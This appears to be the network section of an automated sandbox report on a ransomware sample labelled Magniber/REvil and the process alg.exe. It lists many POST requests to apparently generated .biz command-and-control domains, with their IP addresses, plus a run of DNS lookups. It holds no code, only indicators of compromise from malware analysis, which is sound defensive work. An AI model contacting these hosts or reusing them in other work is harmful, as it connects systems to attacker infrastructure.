2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://xccjj.biz/sicsrtxs

HTTP Response

200
44.221.84.105:80

http://hehckyov.biz/jy

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://hehckyov.biz/jy

HTTP Response

200
44.221.84.105:80

http://hehckyov.biz/unxsi

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://hehckyov.biz/unxsi

HTTP Response

200
54.244.188.177:80

http://rynmcq.biz/jt

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://rynmcq.biz/jt

HTTP Response

200
54.244.188.177:80

http://rynmcq.biz/e

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://rynmcq.biz/e

HTTP Response

200
3.254.94.185:80

http://uaafd.biz/muoxygygdvutqbiv

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://uaafd.biz/muoxygygdvutqbiv

HTTP Response

200
3.254.94.185:80

http://uaafd.biz/htxsrwxpjwjwpw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://uaafd.biz/htxsrwxpjwjwpw

HTTP Response

200
18.141.10.107:80

http://eufxebus.biz/aoudeicsshkurlwk

http

alg.exe

1.5kB
660 B
7
6

HTTP Request

POST http://eufxebus.biz/aoudeicsshkurlwk

HTTP Response

200
18.141.10.107:80

http://eufxebus.biz/hoipcdbunouxdvf

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
668 B
7
6

HTTP Request

POST http://eufxebus.biz/hoipcdbunouxdvf

HTTP Response

200
34.246.200.160:80

http://pwlqfu.biz/ht

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://pwlqfu.biz/ht

HTTP Response

200
34.246.200.160:80

http://pwlqfu.biz/tt

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://pwlqfu.biz/tt

HTTP Response

200
47.129.31.212:80

http://rrqafepng.biz/kydhpcrlingwus

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://rrqafepng.biz/kydhpcrlingwus

HTTP Response

200
47.129.31.212:80

http://rrqafepng.biz/to

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://rrqafepng.biz/to

HTTP Response

200
3.94.10.34:80

http://ctdtgwag.biz/ctsqf

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://ctdtgwag.biz/ctsqf

HTTP Response

200
3.94.10.34:80

http://ctdtgwag.biz/nnuuuo

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://ctdtgwag.biz/nnuuuo

HTTP Response

200
35.164.78.200:80

http://tnevuluw.biz/sghyeiwwrdvmtaos

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://tnevuluw.biz/sghyeiwwrdvmtaos

HTTP Response

200
35.164.78.200:80

http://tnevuluw.biz/e

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://tnevuluw.biz/e

HTTP Response

200
18.141.10.107:80

http://whjovd.biz/haoacbfsnisxth

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://whjovd.biz/haoacbfsnisxth

HTTP Response

200
18.141.10.107:80

http://whjovd.biz/rp

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://whjovd.biz/rp

HTTP Response

200
2.17.107.81:80

http://crl.microsoft.com/pki/crl/products/CSPCA.crl

http

mscorsvw.exe

509 B
2.1kB
6
4

HTTP Request

GET http://crl.microsoft.com/pki/crl/products/CSPCA.crl

HTTP Response

200
44.221.84.105:80

http://reczwga.biz/ta

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://reczwga.biz/ta

HTTP Response

200
44.221.84.105:80

http://reczwga.biz/pjyggum

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
667 B
6
6

HTTP Request

POST http://reczwga.biz/pjyggum

HTTP Response

200
34.211.97.45:80

http://bghjpy.biz/kftnbgygfypyyd

http

alg.exe

1.4kB
698 B
7
7

HTTP Request

POST http://bghjpy.biz/kftnbgygfypyyd

HTTP Response

200
34.211.97.45:80

http://bghjpy.biz/gos

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://bghjpy.biz/gos

HTTP Response

200
18.208.156.248:80

http://damcprvgv.biz/xvwdblfudnygcklw

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://damcprvgv.biz/xvwdblfudnygcklw

HTTP Response

200
18.208.156.248:80

http://damcprvgv.biz/sevyh

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://damcprvgv.biz/sevyh

HTTP Response

200
3.254.94.185:80

http://ocsvqjg.biz/tymoa

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
667 B
6
6

HTTP Request

POST http://ocsvqjg.biz/tymoa

HTTP Response

200
3.254.94.185:80

http://ocsvqjg.biz/ywbeqmgccldlbsq

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://ocsvqjg.biz/ywbeqmgccldlbsq

HTTP Response

200
54.244.188.177:80

http://ywffr.biz/pjuhrfcpwtk

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://ywffr.biz/pjuhrfcpwtk

HTTP Response

200
54.244.188.177:80

http://ywffr.biz/w

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://ywffr.biz/w

HTTP Response

200
54.244.188.177:80

http://ecxbwt.biz/nsybhlkcdpmywy

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://ecxbwt.biz/nsybhlkcdpmywy

HTTP Response

200
54.244.188.177:80

http://ecxbwt.biz/rb

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://ecxbwt.biz/rb

HTTP Response

200
44.213.104.86:80

http://pectx.biz/bbcqgjqqtedgagx

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://pectx.biz/bbcqgjqqtedgagx

HTTP Response

200
44.213.104.86:80

http://pectx.biz/uhlerhwaafkjfd

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://pectx.biz/uhlerhwaafkjfd

HTTP Response

200
18.208.156.248:80

http://zyiexezl.biz/rnvmhjmwnfkj

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://zyiexezl.biz/rnvmhjmwnfkj

HTTP Response

200
18.208.156.248:80

http://zyiexezl.biz/vccakgaeevvktb

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
660 B
6
6

HTTP Request

POST http://zyiexezl.biz/vccakgaeevvktb

HTTP Response

200
44.221.84.105:80

http://banwyw.biz/bsqpibpk

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://banwyw.biz/bsqpibpk

HTTP Response

200
44.221.84.105:80

http://banwyw.biz/mhpelfusxe

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://banwyw.biz/mhpelfusxe

HTTP Response

200
44.221.84.105:80

http://zrlssa.biz/amx

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://zrlssa.biz/amx

HTTP Response

200
44.221.84.105:80

http://zrlssa.biz/t

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://zrlssa.biz/t

HTTP Response

200
18.141.10.107:80

http://jlqltsjvh.biz/qrrcinfuxrxvisa

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://jlqltsjvh.biz/qrrcinfuxrxvisa

HTTP Response

200
18.141.10.107:80

http://jlqltsjvh.biz/kqbwaelefsfxo

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
661 B
6
6

HTTP Request

POST http://jlqltsjvh.biz/kqbwaelefsfxo

HTTP Response

200
18.208.156.248:80

http://xyrgy.biz/sivwehsagapreq

http

alg.exe

1.4kB
657 B
5
6

HTTP Request

POST http://xyrgy.biz/sivwehsagapreq

HTTP Response

200
18.208.156.248:80

http://xyrgy.biz/lvshqkwcpdxqgfh

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://xyrgy.biz/lvshqkwcpdxqgfh

HTTP Response

200
172.234.222.143:80

http://htwqzczce.biz/tcafthtonxtpl

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://htwqzczce.biz/tcafthtonxtpl
172.234.222.138:80

http://htwqzczce.biz/lxkdjqrhttjsuedp

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
204 B
6
5

HTTP Request

POST http://htwqzczce.biz/lxkdjqrhttjsuedp
172.234.222.143:80

http://htwqzczce.biz/koucuapch

http

alg.exe

1.4kB
212 B
6
5

HTTP Request

POST http://htwqzczce.biz/koucuapch
172.234.222.138:80

http://htwqzczce.biz/cdehjinuncqv

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
204 B
6
5

HTTP Request

POST http://htwqzczce.biz/cdehjinuncqv
54.244.188.177:80

http://kvbjaur.biz/ljexmgkyl

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://kvbjaur.biz/ljexmgkyl

HTTP Response

200
54.244.188.177:80

http://kvbjaur.biz/arrehjbcphgebl

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
667 B
6
6

HTTP Request

POST http://kvbjaur.biz/arrehjbcphgebl

HTTP Response

200
44.221.84.105:80

http://uphca.biz/nkruuxr

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://uphca.biz/nkruuxr

HTTP Response

200
44.221.84.105:80

http://uphca.biz/bhsprngmxifidqm

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://uphca.biz/bhsprngmxifidqm

HTTP Response

200
34.211.97.45:80

http://fjumtfnz.biz/jpnu

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://fjumtfnz.biz/jpnu

HTTP Response

200
34.211.97.45:80

http://fjumtfnz.biz/etjcfcchdkp

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://fjumtfnz.biz/etjcfcchdkp

HTTP Response

200
34.211.97.45:80

http://hlzfuyy.biz/kmonv

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://hlzfuyy.biz/kmonv

HTTP Response

200
34.211.97.45:80

http://hlzfuyy.biz/huoxnbjw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://hlzfuyy.biz/huoxnbjw

HTTP Response

200
34.246.200.160:80

http://rffxu.biz/ygv

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://rffxu.biz/ygv

HTTP Response

200
34.246.200.160:80

http://rffxu.biz/tkrnngplax

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://rffxu.biz/tkrnngplax

HTTP Response

200
44.213.104.86:80

http://cikivjto.biz/ybmd

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://cikivjto.biz/ybmd

HTTP Response

200
44.213.104.86:80

http://cikivjto.biz/ufikgfkqepw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://cikivjto.biz/ufikgfkqepw

HTTP Response

200
47.129.31.212:80

http://qncdaagct.biz/icq

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://qncdaagct.biz/icq

HTTP Response

200
47.129.31.212:80

http://qncdaagct.biz/mqpsfy

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
669 B
6
6

HTTP Request

POST http://qncdaagct.biz/mqpsfy

HTTP Response

200
13.251.16.150:80

http://shpwbsrw.biz/tblaic

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://shpwbsrw.biz/tblaic

HTTP Response

200
13.251.16.150:80

http://shpwbsrw.biz/chsq

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://shpwbsrw.biz/chsq

HTTP Response

200
18.208.156.248:80

http://cjvgcl.biz/wojgmoovfsovbv

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://cjvgcl.biz/wojgmoovfsovbv

HTTP Response

200
18.208.156.248:80

http://cjvgcl.biz/qnlbxfummtvy

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://cjvgcl.biz/qnlbxfummtvy

HTTP Response

200
44.221.84.105:80

http://neazudmrq.biz/rufnvitopah

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://neazudmrq.biz/rufnvitopah

HTTP Response

200
44.221.84.105:80

http://neazudmrq.biz/abfeyfqs

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://neazudmrq.biz/abfeyfqs

HTTP Response

200
18.208.156.248:80

http://pgfsvwx.biz/iasjwao

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://pgfsvwx.biz/iasjwao

HTTP Response

200
18.208.156.248:80

http://pgfsvwx.biz/ymm

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://pgfsvwx.biz/ymm

HTTP Response

200
47.129.31.212:80

http://aatcwo.biz/ymm

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://aatcwo.biz/ymm

HTTP Response

200
47.129.31.212:80

http://aatcwo.biz/iygqfrgdwyjlsar

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
706 B
7
7

HTTP Request

POST http://aatcwo.biz/iygqfrgdwyjlsar

HTTP Response

200
18.208.156.248:80

http://kcyvxytog.biz/llniky

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://kcyvxytog.biz/llniky

HTTP Response

200
18.208.156.248:80

http://kcyvxytog.biz/q

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
669 B
6
6

HTTP Request

POST http://kcyvxytog.biz/q

HTTP Response

200
54.244.188.177:80

http://nwdnxrd.biz/cx

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://nwdnxrd.biz/cx

HTTP Response

200
54.244.188.177:80

http://nwdnxrd.biz/hjaewpnobrjgiu

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
667 B
6
6

HTTP Request

POST http://nwdnxrd.biz/hjaewpnobrjgiu

HTTP Response

200
44.213.104.86:80

http://ereplfx.biz/onkt

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://ereplfx.biz/onkt

HTTP Response

200
44.213.104.86:80

http://ereplfx.biz/ckgbfhufoxn

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://ereplfx.biz/ckgbfhufoxn

HTTP Response

200
18.141.10.107:80

http://ptrim.biz/xsfwlodbhneqmede

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://ptrim.biz/xsfwlodbhneqmede

HTTP Response

200
18.141.10.107:80

http://ptrim.biz/twaeghp

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://ptrim.biz/twaeghp

HTTP Response

200
47.129.31.212:80

http://znwbniskf.biz/n

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://znwbniskf.biz/n

HTTP Response

200
47.129.31.212:80

http://znwbniskf.biz/ncoeqjjxw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
669 B
6
6

HTTP Request

POST http://znwbniskf.biz/ncoeqjjxw

HTTP Response

200
44.221.84.105:80

http://cpclnad.biz/rrvmjmh

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://cpclnad.biz/rrvmjmh

HTTP Response

200
44.221.84.105:80

http://cpclnad.biz/vgbamktfkc

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://cpclnad.biz/vgbamktfkc

HTTP Response

200
44.221.84.105:80

http://mjheo.biz/tel

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://mjheo.biz/tel

HTTP Response

200
44.221.84.105:80

http://mjheo.biz/msips

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
697 B
7
7

HTTP Request

POST http://mjheo.biz/msips

HTTP Response

200
18.141.10.107:80

http://wluwplyh.biz/ljycysfgrvlitxn

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://wluwplyh.biz/ljycysfgrvlitxn

HTTP Response

200
18.141.10.107:80

http://wluwplyh.biz/px

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://wluwplyh.biz/px

HTTP Response

200
18.208.156.248:80

http://zgapiej.biz/wia

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://zgapiej.biz/wia

HTTP Response

200
18.208.156.248:80

http://zgapiej.biz/ccspwqmywoldks

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://zgapiej.biz/ccspwqmywoldks

HTTP Response

200
44.221.84.105:80

http://jifai.biz/nutsmrvwfuvgeud

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://jifai.biz/nutsmrvwfuvgeud

HTTP Response

200
44.221.84.105:80

http://jifai.biz/shmsxqimqw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://jifai.biz/shmsxqimqw

HTTP Response

200
13.251.16.150:80

http://xnxvnn.biz/ge

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://xnxvnn.biz/ge

HTTP Response

200
13.251.16.150:80

http://xnxvnn.biz/ctgwyj

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://xnxvnn.biz/ctgwyj

HTTP Response

200
35.164.78.200:80

http://ihcnogskt.biz/rkpia

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://ihcnogskt.biz/rkpia

HTTP Response

200
35.164.78.200:80

http://ihcnogskt.biz/mjxd

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://ihcnogskt.biz/mjxd

HTTP Response

200
18.141.10.107:80

http://kkqypycm.biz/eufmrrrekpipkje

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://kkqypycm.biz/eufmrrrekpipkje

HTTP Response

200
18.141.10.107:80

http://kkqypycm.biz/vfm

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://kkqypycm.biz/vfm

HTTP Response

200
44.213.104.86:80

http://uevrpr.biz/upuvg

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://uevrpr.biz/upuvg

HTTP Response

200
44.213.104.86:80

http://uevrpr.biz/wo

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://uevrpr.biz/wo

HTTP Response

200
34.211.97.45:80

http://fgajqjyhr.biz/tccefxficfxfjppi

http

alg.exe

1.4kB
669 B
5
6

HTTP Request

POST http://fgajqjyhr.biz/tccefxficfxfjppi

HTTP Response

200
34.211.97.45:80

http://fgajqjyhr.biz/ohxfurcbetqlb

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
669 B
6
6

HTTP Request

POST http://fgajqjyhr.biz/ohxfurcbetqlb

HTTP Response

200
18.208.156.248:80

http://hagujcj.biz/pcobnwegildnpu

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://hagujcj.biz/pcobnwegildnpu

HTTP Response

200
35.164.78.200:80

http://sctmku.biz/ghjfopatdt

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://sctmku.biz/ghjfopatdt

HTTP Response

200
18.208.156.248:80

http://hagujcj.biz/rikbejjrlac

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://hagujcj.biz/rikbejjrlac

HTTP Response

200
35.164.78.200:80

http://sctmku.biz/jtrqcd

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://sctmku.biz/jtrqcd

HTTP Response

200
34.211.97.45:80

http://qcrsp.biz/eqnxdopgjhlbk

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://qcrsp.biz/eqnxdopgjhlbk

HTTP Response

200
34.211.97.45:80

http://qcrsp.biz/grrytwjnimqg

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://qcrsp.biz/grrytwjnimqg

HTTP Response

200
44.221.84.105:80

http://sewlqwcd.biz/arsumnpwpn

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://sewlqwcd.biz/arsumnpwpn

HTTP Response

200
54.244.188.177:80

http://dyjdrp.biz/qenqmg

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://dyjdrp.biz/qenqmg

HTTP Response

200
44.221.84.105:80

http://sewlqwcd.biz/iswvcoqkw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://sewlqwcd.biz/iswvcoqkw

HTTP Response

200
54.244.188.177:80

http://dyjdrp.biz/afee

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://dyjdrp.biz/afee

HTTP Response

200
35.164.78.200:80

http://napws.biz/etpgflry

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://napws.biz/etpgflry

HTTP Response

200
54.244.188.177:80

http://qvuhsaqa.biz/gudjod

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://qvuhsaqa.biz/gudjod

HTTP Response

200
35.164.78.200:80

http://napws.biz/gudjod

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://napws.biz/gudjod

HTTP Response

200
54.244.188.177:80

http://qvuhsaqa.biz/hjevxo

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://qvuhsaqa.biz/hjevxo

HTTP Response

200
34.211.97.45:80

http://apzzls.biz/hjevxo

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://apzzls.biz/hjevxo

HTTP Response

200
34.211.97.45:80

http://apzzls.biz/olsvw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
618 B
6
5

HTTP Request

POST http://apzzls.biz/olsvw

HTTP Response

200
47.129.31.212:80

http://krnsmlmvd.biz/wkgb

http

alg.exe

1.3kB
52 B
4
1

HTTP Request

POST http://krnsmlmvd.biz/wkgb
47.129.31.212:80

krnsmlmvd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

52 B
1

8.8.8.8:53

pywolwnvd.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

pywolwnvd.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

ssbzmoy.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

ssbzmoy.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

cvgrf.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

cvgrf.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

npukfztj.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

przvgke.biz

dns

alg.exe

57 B
89 B
1
1

DNS Request

przvgke.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

npukfztj.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

przvgke.biz

dns

alg.exe

57 B
89 B
1
1

DNS Request

przvgke.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

zlenh.biz

dns

alg.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

zlenh.biz

dns

alg.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

alg.exe

114 B
146 B
2
2

DNS Request

knjghuig.biz

DNS Response

18.141.10.107

DNS Request

xnxvnn.biz

DNS Response

13.251.16.150
8.8.8.8:53

uhxqin.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

alg.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

uhxqin.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

alg.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

vjaxhpbji.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

vjaxhpbji.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

xlfhhhm.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

47.129.31.212
8.8.8.8:53

xlfhhhm.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

47.129.31.212
8.8.8.8:53

ifsaia.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

ifsaia.biz

DNS Response

13.251.16.150
8.8.8.8:53

ifsaia.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

ifsaia.biz

DNS Response

13.251.16.150
8.8.8.8:53

saytjshyf.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

saytjshyf.biz

DNS Response

44.221.84.105
8.8.8.8:53

vcddkls.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

saytjshyf.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

saytjshyf.biz

DNS Response

44.221.84.105
8.8.8.8:53

vcddkls.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

fwiwk.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

fwiwk.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

tbjrpv.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160
8.8.8.8:53

deoci.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

18.208.156.248
8.8.8.8:53

fwiwk.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

fwiwk.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

gytujflc.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

gytujflc.biz

DNS Response

208.100.26.245
8.8.8.8:53

tbjrpv.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160
8.8.8.8:53

qaynky.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

qaynky.biz

DNS Response

13.251.16.150
8.8.8.8:53

